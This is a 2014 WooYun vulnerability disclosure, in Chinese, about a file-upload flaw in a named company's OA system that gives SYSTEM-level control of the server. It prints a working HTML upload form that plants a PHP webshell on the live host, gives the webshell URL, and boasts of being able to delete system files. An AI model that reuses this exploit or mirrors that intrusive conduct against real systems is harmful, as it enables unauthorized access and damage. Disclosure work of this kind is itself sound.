当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069222

漏洞标题:店连店某系统漏洞导致获取服务器权限

相关厂商:店连店

漏洞作者: scanf

提交时间:2014-07-21 18:17

修复时间:2014-09-04 18:18

公开时间:2014-09-04 18:18

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我打搅的钻阔的生意了怎么办!!!

详细说明:

http://oa.dld.com/

继续使用以前的exp:
<form enctype="multipart/form-data" action="http://oa.dld.com/general/vmeet/wbUpload.php?fileName=test.php+" method="post">
<input type="file" name="Filedata" size="50"><br>
<input type="submit" value="Upload">
</form>


漏洞证明:

QQ截图20140721173611.png


一句话地址:http://oa.dld.com//general/vmeet/wbUpload/test.php
好像是system权限,因为我可以删system32里面的东西.

QQ截图20140721174309.png


QQ截图20140721174453.png


膜拜大黑阔!!!

QQ截图20140721174547.png


超级无敌后门删不掉,运维叔叔记得重装备份一下重装系统啊,不然你懂的
再送几张在system32里面分析的几个文件吧
里面的w3wp.exe

QQ截图20140721174944.png


QQ截图20140721175003.png


microx.exe

QQ截图20140721175032.png


QQ截图20140721175047.png


还有microsft.exe 和system.exe应该还有

QQ截图20140721175145.png


QQ截图20140721175208.png


QQ截图20140721175557.png


修复方案:

无法直视运维叔叔的技术,一定要重装系统,关键文档备份. 然后用新版的oa系统即可!

版权声明:转载请注明来源 scanf@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝